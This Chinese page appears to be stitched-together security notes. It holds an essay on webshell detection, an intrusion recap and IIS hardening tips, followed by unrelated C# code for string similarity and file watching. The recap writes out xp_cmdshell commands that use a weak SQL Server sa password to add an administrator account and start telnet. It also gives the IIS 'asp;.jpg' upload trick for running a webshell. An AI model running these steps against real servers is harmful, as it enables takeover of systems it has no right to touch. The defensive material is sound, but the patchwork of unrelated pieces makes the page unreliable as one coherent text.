享受代码

目录]
0x00 前言
0x01 Webshell检测模型
0x02 静态特征检测
0x03 动态特征检测
0x04 结语

0x00 前言
什么是webshell？我相信如果看官能有兴趣看这篇文章，一定对webshell有个了解。不
过不了解也没关系，那就请先搜索下相关资料[1]。当然，本着“know it then hack it”
的原则，建议你还是搭个环境，熟悉下先，毕竟纸上谈兵是要不得的。
随着网络的发展，Web站点的增加，webshell这种脚本后门技术也发展起来了，多少黑
客故事都是从一个小小的webshell开始的。所以对于网站，特别是站点和应用众多的互联网
企业，能够在出现webshell的阶段及时发现和响应就显得尤为重要。
本文以笔者多年从事相关工作的经验来探讨下webshell的检测手段。

0x01 Webshell检测模型
记得当年第一个ASP木马出来的时候号称“永不被杀的ASP木马”（请大家虔诚地起立，
我们一起来膜拜一下海洋顶端ASP木马之父LCX大叔），因为它使用正常端口，且脚本容易变
形，使得查杀它变得困难。但是，Webshell这种特殊的Web应用程序也有两个命门：文件和
HTTP请求。
我们先来看下Webshell的运行流程：hacker -> HTTP Protocol -> Web Server -> CGI。
简单来看就是这样一个顺序：黑客通过浏览器以HTTP协议访问Web Server上的一个CGI文件。
棘手的是，webshell就是一个合法的TCP连接，在TCP/IP的应用层之下没有任何特征（当然
不是绝对的），只有在应用层进行检测。
黑客入侵服务器，使用webshell，不管是传文件还是改文件，必然有一个文件会包含
webshell代码，很容易想到从文件代码入手，这是静态特征检测；webshell运行后，B/S数
据通过HTTP交互，HTTP请求/响应中可以找到蛛丝马迹，这是动态特征检测。

0x02 静态特征检测
静态特征检测是指不执行而通过围观的方式来发现webshell，即先建立一个恶意字符串
特征库，然后通过在各类脚本文件中检查是否匹配。这是一种最简单也是最常见的技术，高
级一些的，可能还涉及到语义分析。笔者06年开发的“雷客图ASP站长安全助手”[2]即是通
过此类办法查找ASP类型的webshell的。
静态特征检测面临的一个问题是误报。因为一些特征字符串正常程序本身也需要用到。
比如PHP里面的eval、system等，ASP里面的FileSystemObject、include等。所以雷客图在
设计之初就是一个辅助工具，最终还需要有相关安全经验的人来判定。
对于少量站点可以用这样人肉去检查，如果是一个成千上万站点的大型企业呢，这个时
候再人肉那工作量可就大了。所以用这样一种思路：强弱特征。即把特征码分为强弱两种特
征，强特征命中则必是webshell；弱特征由人工去判断。加入一种强特征，即把流行webshell
用到的特征作为强特征重点监控，一旦出现这样的特征即可确认为webshell立即进行响应。
比如PHPSpy里面会出现phpspy、wofeiwo、eval($_POST[xxx])等，ASP里面出现Shell.Application
等。当然，黑客完全可以变形躲过，没关系，还有人工检查的弱特征。
另一个问题是漏报。程序的关键是特征字符串，它直接关系着结果，如果你的特征库里
面没有记录的甚至是一种新的webshell代码，就可能束手无策了。雷客图第一版出来后，我
自以为所有的ASP webshell都可以查了，但是我错了，因为不断会有新的方式出来绕过，最
终结果就是特征被动的跟着webshell升级而升级，同时还面临未知的webshell??这个情况
和特征码杀毒软件何其相似。
要解决误报和漏报，就不能拘泥于代码级别了。可以换个角度考虑问题：文件系统。我
们可以结合文件的属性来判断，比如apache是noboy启动的，webshell的属主必然也是nobody，
如果我的Web目录无缘无故多了个nobody的文件，这里就有问题了。最理想的办法是需要制度
和流程来建设一个Web目录唯一发布入口，控制住这个入口，非法进来的Web文件自然可以发
现。

0x03 动态特征检测
webshell传到服务器了，黑客总要去执行它吧，webshell执行时刻表现出来的特征，我
们称为动态特征。
先前我们说到过webshell通信是HTTP协议。只要我们把webshell特有的HTTP请求/响应
做成特征库，加到IDS里面去检测所有的HTTP请求就好了。
这个方案有个问题就是漏报。首先你得把网上有的webshell都搜集起来抓特征，这是个
体力活，新的webshell出来还要去更新这个库，总是很被动，被动就算了，但是一些不曾公
开的webshell通信就会漏掉。那么这个方案有没有效果，只能说效果有限吧，对付拿来主义
的菜鸟可以，遇到高级一些的黑客就无效了。杀毒软件都搞主动防御了，webshell也不能老
搞特征码是吧。
webshell起来如果执行系统命令的话，会有进程。Linux下就是nobody用户起了bash，
Win下就是IIS User启动cmd，这些都是动态特征，不过需要看黑客是否执行命令（多半会这
样），还有就是你的服务器上要有一个功能强大的Agent。要是黑客高兴，再反连回去，这
下就更好了，一个TCP连接（也可能是UDP），Agent和IDS都可以抓现行。这里还涉及到主机
后门的一些检测策略，以后有机会再另文叙述。
回到网络层来，之前我们探讨过，Webshell总有一个HTTP请求，如果我在网络层监控HTTP
请求（我没有监控Apache/IIS日志），有一天突然出现一个新的PHP文件请求或者一个平时
是GET请求的文件突然有了POST请求，还返回的200，这里就有问题了。这种基于区别于正常
请求的异常模型，姑且称之为HTTP异常请求模型检测。一旦有了这样的模型，除了Webshell，
还可以发现很多问题的。
还有一个思路来自《浅谈javascript函数劫持》[3]和某款代码审计软件。回忆一下，
我们调试网马的时候，怎么还原它各种稀奇古怪的加密算法呢，简单，把eval改成alert就
好了！类似的，所以我们可以在CGI全局重载一些函数（比如ASP.Net的global.asax文件），
当有webshell调用的时候就可以发现异常。例如以下ASP代码就实现了对ASP的execute函数
的重载：
–code————————————————————————-
<% Function execute(stra) Response.Write("get the arg : "+stra) End Function a="response.write(""hello,world"")" execute(a) %>
——————————————————————————-
这个方法在应用层还是有些问题，所以如果在CGI引擎内核里面改可能会好些。根据小
道消息，这期ph4nt0m的webzine会有一篇文章涉及PHP内核中防webshell的，有兴趣的同学
可以关注。

0x04 结语
本文只探讨了检测Webshell的一些思路，希望对你有些帮助，如果你有更好的方案，也
可以和我探讨。至于一些工具和特征，由于这样那样的原因就不公开了，我始终认为，相比
于工具，思路永远是最重要的。

过程：利用x-scan扫描目标机，因服务器sqlserver是弱口令，得到sa权限。用查询分析器连接上去，执行以下方法添加一个管理员账号，进尔得到服务器的控制权限：

–打开xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;

use master;
xp_cmdshell ‘dir c:‘;
记得分号是不可以少的哦。一切正常。显示出来了c:盘下的目录和文件。那就继续下去，
添加windows用户：
xp_cmdshell ‘net user awen /add‘;
设置好密码：
xp_cmdshell ‘net user awen password‘;
提升到管理员：
xp_cmdshell ‘net localgroup administrators awen /add‘;
开启telnet服务：
xp_cmdshell ‘net start tlntsvr‘

应对方式：net.exe ；net1.exet ；cmd.exe ；tftp.exe ；netstat.exe ；regedit.exe ；at.exe ；
attrib.exe;cacls.exe;format.com;ftp.exe;at.exe;telnet.exe;command.com;netstat.exe;arp.exe;nbtstat.exe仅给管理员权限，其它都去掉，包括system

1，模拟过程：hacker破解掉网站后台密码后，在文件上传中，上传了一个jpg的木马，网站上面是可以显示图片路径的，然后他在地址栏中执行,由于服务器没有做安全权限，故得到一切…
jpg木马：一个asp或asa木马，将其名称改为 aaa.asp;.jpg 或者aaa.asp;.aaa
这种木马是IIS在执行时有一个解析漏洞引起，称为IIS解析漏洞
IIS解析漏洞
1,网站上传图片的时候，将网页木马文件的名字改成“*.asp;.jpg”，也同样会被 IIS 当作 asp 文件来解析并执行。例如上传一个图片文件，名字叫“vidun.asp;.jpg”的木马文件，该文件可以被当作 asp 文件解析并执行。

2,在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹，其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp，那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。

木马查找：ASPX：DirectoryInfo ASP：filesystemobject

预防措施：
一、网站
1，网站后台密码设置复杂，14位以上
2，限制IP登录
3，上传文件的地方，除限制文件类型外，获取上传文件的后缀名,文件名随机生成，这样就去掉了asp.生成的文件为xxx.jpg,而不在是xxx.aspa;.jpg。
同时，在IIS中，右击上传文件夹，执行权限设置为无

4,若网站是aspx的，那么去掉asp的映射。
二、服务器
1，磁盘目录，仅给administrator,system权限,在高级里面，记得将允许父…,将此…都打上√
把windows临时文件夹temp转移到其它盘
1。在D盘建立temp这个文件夹
2。控制面板/系统/高级/环境变量/用户变量/把temp和tmp值编辑到 d:\temp
3。控制面板/系统/高级/环境变量/系统变量/把temp和tmp值编辑到 d:\temp
4。仅给administrator,system权限，及networkservice的读写权限，重启系统后生效
2,网站目录:networkservice,IIS来宾账号给予读取权限，administrator给予所有权限，其它都去掉。
仅上传文件的目录写权限
3,网站源码：封装成dll,混淆，web.config中的数据库链接移出，字符串加密放到注册表中，在封装的dll类中读取此注册表项信息即可，放在注册表中方便修改。

防止执行CMD
卸载wscript.shell对象，在cmd下或直接运行：regsvr32 /u %windir%\system32\WSHom.Ocx
卸载FSO对象,在cmd下或直接运行：regsvr32.exe /u %windir%\system32\scrrun.dll
卸载stream对象,在cmd下或直接运行： regsvr32 /s /u “C:\Program Files\Common Files\System\ado\msado15.dll”

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace ConsoleApplication38
{
    public class LevenshteinDistance
    {

        private static LevenshteinDistance _instance=null;
        public static LevenshteinDistance Instance
        {
            get
            {
                if (_instance == null)
                {
                    return new LevenshteinDistance();
                }
                return _instance;
            }
        }
    

        /// <summary>
        /// 取最小的一位数
        /// </summary>
        /// <param name="first"></param>
        /// <param name="second"></param>
        /// <param name="third"></param>
        /// <returns></returns>
        public int LowerOfThree(int first, int second, int third)
        {
            int min = first;
            if (second < min)
                min = second;
            if (third < min)
                min = third;
            return min;
        }

        public int Levenshtein_Distance(string str1, string str2)
        {
            int[,] Matrix;
            int n=str1.Length;
            int m=str2.Length;

            int temp = 0;
            char ch1;
            char ch2;
            int i = 0;
            int j = 0;
            if (n ==0)
            {
                return m;
            }
            if (m == 0)
            {

                return n;
            }
            Matrix=new int[n+1,m+1];

            for (i = 0; i <= n; i++)
            {
                //初始化第一列
                Matrix[i,0] = i;
            }

            for (j = 0; j <= m; j++)
            {
                //初始化第一行
                Matrix[0, j] = j;
            }

            for (i = 1; i <= n; i++)
            {
                ch1 = str1[i-1];
                for (j = 1; j <= m; j++)
                {
                    ch2 = str2[j-1];
                    if (ch1.Equals(ch2))
                    {
                        temp = 0;
                    }
                    else
                    {
                        temp = 1;
                    }
                    Matrix[i,j] = LowerOfThree(Matrix[i - 1,j] + 1, Matrix[i,j - 1] + 1, Matrix[i - 1,j - 1] + temp);


                }
            }

            for (i = 0; i <= n; i++)
            {
                for (j = 0; j <= m; j++)
                {
                    Console.Write(" {0} ", Matrix[i, j]);
                }
                Console.WriteLine("");
            }
            return Matrix[n, m];

        }

        /// <summary>
        /// 计算字符串相似度
        /// </summary>
        /// <param name="str1"></param>
        /// <param name="str2"></param>
        /// <returns></returns>
        public decimal LevenshteinDistancePercent(string str1,string str2)
        {
            int maxLenth = str1.Length > str2.Length ? str1.Length : str2.Length;
            int val = Levenshtein_Distance(str1, str2);
            return 1 - (decimal)val / maxLenth;
        }
    }

    class Program
    {


        static void Main(string[] args)
        {
            string str1 = "你好蒂蒂";
            string str2="你好蒂芬";
            Console.WriteLine("字符串1 {0}", str1);

            Console.WriteLine("字符串2 {0}", str2);

            Console.WriteLine("相似度 {0} %", LevenshteinDistance.Instance.LevenshteinDistancePercent(str1, str2)*100);
            Console.ReadLine();
        }
    }



}

public class Watcher
{

    public static void Main()
    {
    Run();

    }

    [PermissionSet(SecurityAction.Demand, Name="FullTrust")]
    public static void Run()
    {
        string[] args = System.Environment.GetCommandLineArgs();

        // If a directory is not specified, exit program.
        if(args.Length != 2)
        {
            // Display the proper way to call the program.
            Console.WriteLine("Usage: Watcher.exe (directory)");
            return;
        }

        // Create a new FileSystemWatcher and set its properties.
        FileSystemWatcher watcher = new FileSystemWatcher();
        watcher.Path = args[1];
        /* Watch for changes in LastAccess and LastWrite times, and
           the renaming of files or directories. */
        watcher.NotifyFilter = NotifyFilters.LastAccess | NotifyFilters.LastWrite
           | NotifyFilters.FileName | NotifyFilters.DirectoryName;
        // Only watch text files.
        watcher.Filter = "*.txt";

        // Add event handlers.
        watcher.Changed += new FileSystemEventHandler(OnChanged);
        watcher.Created += new FileSystemEventHandler(OnChanged);
        watcher.Deleted += new FileSystemEventHandler(OnChanged);
        watcher.Renamed += new RenamedEventHandler(OnRenamed);

        // Begin watching.
        watcher.EnableRaisingEvents = true;

        // Wait for the user to quit the program.
        Console.WriteLine("Press \'q\' to quit the sample.");
        while(Console.Read()!='q');
    }

    // Define the event handlers.
    private static void OnChanged(object source, FileSystemEventArgs e)
    {
        // Specify what is done when a file is changed, created, or deleted.
       Console.WriteLine("File: " +  e.FullPath + " " + e.ChangeType);
    }

    private static void OnRenamed(object source, RenamedEventArgs e)
    {
        // Specify what is done when a file is renamed.
        Console.WriteLine("File: {0} renamed to {1}", e.OldFullPath, e.FullPath);
    }
}

1，360arp防火墙开着，不是arp欺骗
2，在%windir%\system32\inetsrv\MetaBase.xml看到DefaultDocFooter指向一其它文件，明白原因所在！，删除。
DefaultDocFooter 属性指定附加到返回到客户端的 HTML 文件的自定义页脚（页脚并不附加到 ASP 文件）。如果将 EnableDocFooter 属性设置为 true，则仅发送自定义页脚。页脚可以是一个字符串
DirBrowseFlags 控制是否启用目录浏览，可以提供多少目录和文件信息（如果启用浏览）以及目录中是否包含默认页的标记。
注意 如果客户端访问目录时没有提供文件名，而 EnableDefaultDoc 标志设置为 true，那么服务器将查找 DefaultDoc 属性指定的默认文件。如果该目录中不存在默认文件，而 EnableDirBrowsing 标志又设置为 true，那么系统将启用目录浏览。